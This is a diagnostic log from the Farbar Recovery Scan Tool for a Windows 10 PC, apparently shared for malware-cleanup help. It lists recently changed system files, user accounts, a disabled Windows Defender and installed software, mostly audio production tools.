2019-05-14 19:49 - 2019-04-19 11:38 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDSPnf.exe
2019-05-14 19:49 - 2019-04-19 11:38 - 000040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfproc.dll
2019-05-14 19:49 - 2019-04-19 11:36 - 000346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcGenral.dll
2019-05-14 19:49 - 2019-04-19 11:34 - 000522240 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2019-05-14 19:49 - 2019-04-19 10:44 - 001454648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2019-05-14 19:49 - 2019-04-19 10:37 - 000607960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2019-05-14 19:49 - 2019-04-19 10:30 - 000036864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perfproc.dll
2019-05-14 19:49 - 2019-04-19 10:28 - 011940864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2019-05-14 19:49 - 2019-04-19 10:26 - 002405888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcGenral.dll
2019-05-14 19:49 - 2019-04-19 10:25 - 000423936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2019-05-14 19:49 - 2019-04-19 06:07 - 000985400 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2019-05-14 19:49 - 2019-04-19 06:06 - 002571632 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2019-05-14 19:49 - 2019-04-19 06:06 - 000798520 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2019-05-14 19:49 - 2019-04-19 06:06 - 000713264 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2019-05-14 19:49 - 2019-04-19 06:06 - 000436024 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2019-05-14 19:49 - 2019-04-19 06:06 - 000274232 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2019-05-14 19:49 - 2019-04-19 06:02 - 000831800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2019-05-14 19:49 - 2019-04-19 06:01 - 001982008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2019-05-14 19:49 - 2019-04-19 06:01 - 000581592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVideoDSP.dll
2019-05-14 19:49 - 2019-04-19 06:01 - 000576016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2019-05-14 19:49 - 2019-04-19 06:01 - 000380728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2019-05-14 19:49 - 2019-04-19 05:43 - 000150016 _____ (Microsoft Corporation) C:\WINDOWS\system32\fcon.dll
2019-05-14 19:49 - 2019-04-19 05:42 - 004384256 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2019-05-14 19:49 - 2019-04-19 05:41 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmmigrator.dll
2019-05-14 19:49 - 2019-04-19 05:41 - 000095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\EduPrintProv.exe
2019-05-14 19:49 - 2019-04-19 05:40 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserexport.exe
2019-05-14 19:49 - 2019-04-19 05:40 - 000243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpnServiceDS.dll
2019-05-14 19:49 - 2019-04-19 05:40 - 000172544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\enrollmentapi.dll
2019-05-14 19:49 - 2019-04-19 05:40 - 000167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\FilterDS.dll
2019-05-14 19:49 - 2019-04-19 05:40 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetDriverInstall.dll
2019-05-14 19:49 - 2019-04-19 05:39 - 005307392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2019-05-14 19:49 - 2019-04-19 05:39 - 000567296 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2019-05-14 19:49 - 2019-04-19 05:39 - 000425472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SDDS.dll
2019-05-14 19:49 - 2019-04-19 05:39 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingASDS.dll
2019-05-14 19:49 - 2019-04-19 05:39 - 000361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2019-05-14 19:49 - 2019-04-19 05:39 - 000204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2019-05-14 19:49 - 2019-04-19 05:38 - 002368512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2019-05-14 19:49 - 2019-04-19 05:38 - 000593408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2019-05-14 19:49 - 2019-04-19 05:38 - 000391680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2019-05-14 19:49 - 2019-04-19 05:38 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2019-05-14 19:49 - 2019-04-19 05:38 - 000300544 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll
2019-05-14 19:49 - 2019-04-19 05:38 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2019-05-14 19:49 - 2019-04-19 05:37 - 000953856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2019-05-14 19:49 - 2019-04-19 05:37 - 000445952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll
2019-05-14 19:49 - 2019-04-19 05:37 - 000397312 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2019-05-14 19:49 - 2019-04-19 05:37 - 000381952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2019-05-14 19:49 - 2019-04-19 05:37 - 000366080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2019-05-14 19:49 - 2019-04-19 05:37 - 000221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2019-05-14 19:49 - 2019-04-19 05:37 - 000118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2019-05-14 19:49 - 2019-04-19 05:36 - 002909696 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2019-05-14 19:49 - 2019-04-19 05:36 - 001300992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2019-05-14 19:49 - 2019-04-19 05:36 - 000827392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2019-05-14 19:49 - 2019-04-19 05:36 - 000814592 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2019-05-14 19:49 - 2019-04-19 05:36 - 000546816 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2019-05-14 19:49 - 2019-04-19 05:36 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2019-05-14 19:49 - 2019-04-19 05:36 - 000186368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll
2019-05-14 19:49 - 2019-04-19 05:35 - 001938944 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2019-05-14 19:49 - 2019-04-19 05:35 - 001458688 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2019-05-14 19:49 - 2019-04-19 05:35 - 001175552 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2019-05-14 19:49 - 2019-04-19 05:35 - 001156608 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2019-05-14 19:49 - 2019-04-19 05:35 - 000784896 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2019-05-14 19:49 - 2019-04-19 05:35 - 000607232 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2019-05-14 19:49 - 2019-04-19 05:35 - 000535040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2019-05-14 19:49 - 2019-04-19 05:35 - 000523776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2019-05-14 19:49 - 2019-04-19 05:35 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapibase.dll
2019-05-14 19:49 - 2019-04-19 05:34 - 000935936 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2019-05-14 19:49 - 2019-04-19 05:34 - 000899584 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2019-05-14 19:49 - 2019-04-19 05:34 - 000885760 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2019-05-14 19:49 - 2019-04-19 05:34 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2019-05-14 19:49 - 2019-04-19 05:34 - 000653312 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2019-05-14 19:49 - 2019-04-19 04:18 - 000806360 _____ C:\WINDOWS\SysWOW64\locale.nls
2019-05-14 19:49 - 2019-04-19 04:18 - 000806360 _____ C:\WINDOWS\system32\locale.nls
2019-05-14 19:49 - 2019-04-09 02:48 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2019-05-14 19:49 - 2019-04-09 02:48 - 000376320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspbde40.dll
2019-05-14 19:49 - 2019-04-09 02:48 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2019-05-14 19:49 - 2019-04-09 02:48 - 000341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2019-05-14 19:49 - 2019-04-09 02:48 - 000240640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msltus40.dll
2019-05-11 07:40 - 2019-04-24 09:06 - 000205992 _____ (Lenovo Group Ltd.) C:\WINDOWS\system32\Lenovo.Modern.CoreTypes.dll
2019-05-11 07:40 - 2019-04-24 09:06 - 000130728 _____ (Lenovo Group Ltd.) C:\WINDOWS\system32\Lenovo.Modern.Utilities.dll
2019-05-11 07:40 - 2019-04-24 09:06 - 000097448 _____ (Lenovo Group Ltd.) C:\WINDOWS\system32\Lenovo.Modern.ImController.ImClient.dll
2019-05-11 07:40 - 2019-04-24 09:06 - 000043688 _____ (Lenovo Group Ltd.) C:\WINDOWS\system32\Lenovo.ImController.EventLogging.dll
2019-05-10 22:16 - 2019-05-10 22:16 - 000000000 ____D C:\Users\MYMLA\New folder
2019-05-10 22:15 - 2019-05-10 22:15 - 000001099 _____ C:\Users\MYMLA\Desktop\Magic MP3 Tagger.lnk
2019-05-10 22:15 - 2019-05-10 22:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Magic MP3 Tagger
2019-05-10 22:15 - 2019-05-10 22:15 - 000000000 ____D C:\Program Files (x86)\Magic MP3 Tagger
2019-05-10 22:14 - 2019-05-10 22:15 - 004645440 _____ (Mathias Kunter ) C:\Users\MYMLA\Downloads\magic_tagger_db_2011-05-16.exe
2019-05-10 22:14 - 2019-05-10 22:14 - 005579472 _____ (Mathias Kunter ) C:\Users\MYMLA\Downloads\magic_tagger.exe
2019-05-10 19:34 - 2019-05-10 19:34 - 000867243 _____ C:\Users\MYMLA\Downloads\mp3gain-win-1_2_5 (1).exe
==================== One month (modified) ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-06-09 19:49 - 2018-09-17 20:30 - 000000000 ____D C:\Program Files (x86)\Steam
2019-06-09 19:48 - 2018-04-12 00:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-06-09 19:47 - 2018-10-05 20:57 - 000000000 ____D C:\Program Files (x86)\TunnelBear
2019-06-09 19:47 - 2018-09-17 18:36 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-06-09 19:46 - 2018-04-11 22:04 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2019-06-09 19:46 - 2017-08-09 23:08 - 000065536 _____ C:\WINDOWS\system32\spu_storage.bin
2019-06-09 19:46 - 2017-03-18 22:03 - 000000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2019-06-09 19:38 - 2018-09-16 13:41 - 000000000 ____D C:\Users\MYMLA\AppData\Roaming\BitTorrent
2019-06-09 19:27 - 2018-04-12 00:38 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2019-06-09 18:54 - 2019-03-20 20:34 - 000000000 ____D C:\Users\MYMLA\AppData\Roaming\vlc
2019-06-09 18:52 - 2018-09-17 18:18 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2019-06-09 16:36 - 2018-12-31 12:27 - 000000000 ____D C:\Users\MYMLA\AppData\Roaming\Cabbage2
2019-06-09 16:19 - 2018-09-17 18:22 - 000000000 ____D C:\Users\MYMLA
2019-06-09 14:40 - 2018-09-19 14:12 - 000000000 ____D C:\Users\MYMLA\AppData\Local\D3DSCache
2019-06-09 14:25 - 2018-04-12 00:38 - 000000000 ___HD C:\Program Files\WindowsApps
2019-06-09 14:25 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\AppReadiness
2019-06-06 17:59 - 2018-09-16 13:35 - 000002308 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-06-06 17:59 - 2018-09-16 13:35 - 000002267 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-06-05 20:38 - 2018-09-17 09:26 - 000000000 ____D C:\VST64
2019-06-04 22:45 - 2018-11-24 17:58 - 000000000 ____D C:\Users\MYMLA\AppData\Roaming\Sky Go
2019-06-04 19:02 - 2018-09-27 19:40 - 000000000 ____D C:\Users\MYMLA\AppData\Local\babl-0.1
2019-06-04 18:41 - 2018-10-19 10:19 - 000000000 ____D C:\Users\MYMLA\AppData\Local\gtk-2.0
2019-06-04 18:11 - 2018-12-31 12:27 - 000000856 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cabbage.lnk
2019-06-04 18:11 - 2018-12-31 12:26 - 000000000 ____D C:\Program Files\Cabbage
2019-06-02 10:17 - 2018-09-17 18:18 - 000413544 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2019-06-01 17:45 - 2018-09-17 18:36 - 000003378 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1007420050-912919110-3395148121-1001
2019-06-01 17:45 - 2018-09-17 18:22 - 000002370 _____ C:\Users\MYMLA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-06-01 17:45 - 2017-10-25 11:25 - 000000000 ___RD C:\Users\MYMLA\OneDrive
2019-05-26 14:18 - 2018-09-17 09:58 - 000000000 ____D C:\Kontakt Instruments
2019-05-25 23:04 - 2018-09-28 15:18 - 000000000 ____D C:\Users\MYMLA\AppData\Roaming\audacity
2019-05-22 21:04 - 2018-09-28 13:03 - 000767996 _____ C:\WINDOWS\system32\perfh019.dat
2019-05-22 21:04 - 2018-09-28 13:03 - 000150740 _____ C:\WINDOWS\system32\perfc019.dat
2019-05-22 21:04 - 2018-09-17 18:32 - 001748432 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-05-22 21:04 - 2018-04-12 00:36 - 000000000 ____D C:\WINDOWS\INF
2019-05-20 18:46 - 2018-04-12 00:30 - 000000000 ____D C:\WINDOWS\CbsTemp
2019-05-19 09:06 - 2019-02-04 19:11 - 2901032960 ____R C:\Users\MYMLA\Downloads\7z.iso
2019-05-18 22:49 - 2019-02-24 18:10 - 000000000 ____D C:\Users\MYMLA\AppData\Local\ElevatedDiagnostics
2019-05-18 11:15 - 2019-02-01 23:08 - 000000000 ____D C:\Users\MYMLA\AppData\Local\Spectrasonics
2019-05-18 11:13 - 2018-09-28 11:42 - 000000016 _____ C:\Users\MYMLA\AppData\Roaming\msregsvv.dll
2019-05-18 11:13 - 2018-09-28 11:42 - 000000016 _____ C:\ProgramData\autobk.inc
2019-05-18 11:08 - 2018-09-17 10:03 - 000000000 ____D C:\Users\MYMLA\AppData\Local\Native Instruments
2019-05-18 11:08 - 2018-09-17 10:02 - 000000000 ___RD C:\Users\MYMLA\Documents\Native Instruments
2019-05-18 10:35 - 2018-09-23 00:59 - 000000000 ____D C:\Program Files\VSTPlugIns
2019-05-18 10:35 - 2018-09-17 09:41 - 000000000 ___RD C:\Program Files\Native Instruments
2019-05-18 10:35 - 2018-09-17 09:41 - 000000000 ___RD C:\Program Files\Common Files\Native Instruments
2019-05-17 17:20 - 2018-09-14 10:52 - 000000000 ____D C:\Program Files\rempl
2019-05-16 22:08 - 2019-01-24 19:34 - 000001049 _____ C:\Users\MYMLA\Desktop\Sky Go.lnk
2019-05-16 22:08 - 2018-11-24 17:57 - 000000000 ____D C:\Users\MYMLA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sky
2019-05-15 19:52 - 2018-09-17 18:36 - 000003418 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2019-05-15 19:52 - 2018-09-17 18:36 - 000003294 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2019-05-14 21:00 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2019-05-14 21:00 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\TextInput
2019-05-14 21:00 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\ShellExperiences
2019-05-14 21:00 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\bcastdvr
2019-05-14 19:48 - 2018-09-16 14:36 - 000000000 ____D C:\WINDOWS\system32\MRT
2019-05-14 19:46 - 2018-09-16 14:36 - 132445408 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2019-05-13 22:13 - 2019-02-19 22:35 - 000000000 ____D C:\Program Files (x86)\MP3Gain
2019-05-10 20:44 - 2019-05-09 20:55 - 000000000 ____D C:\Users\MYMLA\Downloads\시티팝 베스트
==================== Files in the root of some directories =======
2018-09-28 11:42 - 2019-05-18 11:13 - 000000016 _____ () C:\Users\MYMLA\AppData\Roaming\msregsvv.dll
2019-06-04 18:41 - 2019-06-04 18:41 - 000005933 _____ () C:\Users\MYMLA\AppData\Local\recently-used.xbel
2018-09-16 17:09 - 2018-09-16 17:09 - 000000017 _____ () C:\Users\MYMLA\AppData\Local\resmon.resmoncfg
==================== SigCheck ===============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 09-06-2019 01
Ran by MYMLA (09-06-2019 19:54:25)
Running from C:\Users\MYMLA\Downloads
Windows 10 Home Version 1803 17134.765 (X64) (2018-09-17 17:38:00)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-1007420050-912919110-3395148121-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1007420050-912919110-3395148121-503 - Limited - Disabled)
Guest (S-1-5-21-1007420050-912919110-3395148121-501 - Limited - Disabled)
MYMLA (S-1-5-21-1007420050-912919110-3395148121-1001 - Administrator - Enabled) => C:\Users\MYMLA
WDAGUtilityAccount (S-1-5-21-1007420050-912919110-3395148121-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
7-Zip 18.05 (x64) (HKLM\...\7-Zip) (Version: 18.05 - Igor Pavlov)
Altiverb 7 Uninstaller (HKLM\...\{367662CA-394A-4095-9549-973FC3807B9B}_is1) (Version: 7.2 - Audio Ease BV)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 18.10.1 - Advanced Micro Devices, Inc.)
AmpliTube 4 version 4.6.0 (HKLM\...\{21B0C8E0-7EB7-4832-B764-20A7DAE86E02}_is1) (Version: 4.6.0 - IK Multimedia)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
Audacity 2.2.2 (HKLM-x32\...\Audacity_is1) (Version: 2.2.2 - Audacity Team)
Bitcoin Gold (64-bit) (HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\Bitcoin Gold (64-bit)) (Version: 0.15.2 - Bitcoin Gold project)
BitTorrent (HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\BitTorrent) (Version: 7.10.5.44995 - BitTorrent Inc.)
Branding64 (HKLM\...\{EE2AFCE4-0238-4DE0-A140-1647021627C1}) (Version: 1.00.0001 - Advanced Micro Devices, Inc.) Hidden
Cabbage version 2 (HKLM-x32\...\{5504E7FB-F385-40B0-8D46-35E7A544A383}_is1) (Version: 2 - Cabbage Audio)
calibre (HKLM-x32\...\{CF5F9723-E951-4080-BF78-7263A1C9C396}) (Version: 3.32.0 - Kovid Goyal)
Catalyst Control Center Next Localization BR (HKLM\...\{8A29A8D7-8108-1A32-CA6D-1AC90FD36758}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{30D72A5C-CE8A-9ADB-C247-1F14C0B68ABB}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{A2414DE4-2B81-F09E-13AD-ED72EDB94806}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{3E080882-58FD-E0FA-0ACD-467C5009C5D2}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{5E5C8CBF-154D-684B-926A-F2B6D77207FA}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{059A1C9E-0DB4-E241-781A-E4D330B512A6}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{1823E449-5FF6-6D42-1B1B-5C44422D88E7}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{9E258DFB-5906-FA6D-2577-9E93A167F009}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{C2333BBF-DE53-3C2D-3CA6-CFCFCBFDD411}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{0A17D72C-40CA-9F6E-8B18-2806CECE652C}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{8F8C42B4-4F51-2048-3584-4D56BBB568A9}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{6EE6CC89-6A57-A5D2-88B8-D1CEA2F3F250}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{59877761-A89C-BD58-B62A-CB87270CD6AE}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{7FCA37ED-838F-44F4-E00F-41BB67EC3516}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{D03714D3-01E7-1316-8D7A-E5D45C48E4F6}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{1CA6D559-004D-4787-0A4A-6D58E980E63B}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{BF56C410-2A09-FC97-5595-CC54BAFFCEE9}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{3B573C6D-77A4-9DBE-64D8-651605B9FF61}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{F38C99DD-A490-F4F9-CA04-8B4BA755249C}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{ED49927C-C5C9-374D-5C25-CF03B7BA4CAB}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{0835A3CB-C790-7AAE-E779-749504660DCD}) (Version: 2017.0614.553.8771 - Advanced Micro Devices, Inc.) Hidden
CCSDK (HKLM-x32\...\{964ACF65-2550-4B28-8E45-606A618C64EE}) (Version: 3.0.0.16 - Lenovo)
Cisco VideoGuard Player (HKLM-x32\...\{30e4813e-2a86-4e4f-82ea-23df71ca8ffb}) (Version: 10.1.1.6570 - Cisco Systems, Inc)
Csound6_x64 version 6 (HKLM-x32\...\{180B4E5B-9A2F-4DA8-8692-97A174ACB74E}_is1) (Version: 6 - Csound)
Custom Shop version 1.8.0 (HKLM-x32\...\{21BAD046-50EC-49E2-BE7B-F9729704F2C3}_is1) (Version: 1.8.0 - IK Multimedia)
CyberLink PowerDVD 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.1.7626 - CyberLink Corp.)
FL Studio 20 (HKLM-x32\...\FL Studio 20) (Version: - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version: - Image-Line)
FlacSquisher 1.3.8 (HKLM-x32\...\FlacSquisher) (Version: 1.3.8 - FlacSquisher)
Focusrite USB 4.36.5.0 (HKLM\...\Focusrite USB_is1) (Version: 4.36.5.0 - Focusrite Audio Engineering Ltd.)
GIMP 2.10.6 (HKLM\...\GIMP-2_is1) (Version: 2.10.6 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 75.0.3770.80 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
Grand Theft Auto V (HKLM-x32\...\Grand Theft Auto V_is1) (Version: - )
IK Multimedia Authorization Manager version 1.0.20 (HKLM\...\{85BC0DCB-69E5-4279-AA25-F108EF896588}_is1) (Version: 1.0.20 - IK Multimedia)
IL Download Manager (HKLM-x32\...\IL Download Manager) (Version: - Image-Line)
Intel(R) C++ Redistributables on IA-32 (HKLM-x32\...\{317059CB-7642-4F2E-89C0-62E69D4074B7}) (Version: 15.0.148 - Intel Corporation)
Intel(R) C++ Redistributables on Intel(R) 64 (HKLM-x32\...\{2DD3C090-2986-4970-B3CB-87BB4C8AC4A5}) (Version: 15.0.148 - Intel Corporation)
Java 8 Update 211 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180211F0}) (Version: 8.0.2110.12 - Oracle Corporation)
JetBrains PyCharm Community Edition 2019.1.1 (HKLM-x32\...\PyCharm Community Edition 2019.1.1) (Version: 191.6605.12 - JetBrains s.r.o.)
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - )
Lenovo Essential Wireless Keyboard (HKLM\...\Lenovo Essential Wireless Keyboard) (Version: 1.0 - Lenovo)
Lenovo Family Cloud Server (HKLM\...\{7A0FD846-7176-4265-B7B9-5D3FFFC1FA6C}) (Version: 1.3.29.0527 - Lenovo) Hidden
Lenovo Family Cloud Server (HKLM-x32\...\InstallShield_{7A0FD846-7176-4265-B7B9-5D3FFFC1FA6C}) (Version: 1.3.29.0527 - Lenovo)
Lenovo Power2Go (HKLM-x32\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.8231 - CyberLink Corp.) Hidden
Lenovo Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.8231 - CyberLink Corp.)
Magic MP3 Tagger 2.2.6 (HKLM-x32\...\uniquemagicmp3taggerappid_is1) (Version: - Mathias Kunter)
Malwarebytes version 3.7.1.2839 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.7.1.2839 - Malwarebytes)
Massive (HKLM\...\Massive_is1) (Version: 1.5.5 - Native Instruments & Team V.R)
Max 8 (64-bit) (HKLM\...\{60329BCD-948A-4015-A1B8-73E72B69D6E1}) (Version: 8.0.1 - Cycling '74)
Microsoft Office Professional Plus 2019 - en-us (HKLM\...\ProPlus2019Retail - en-us) (Version: 16.0.11425.20228 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\OneDriveSetup.exe) (Version: 19.070.0410.0007 - Microsoft Corporation)
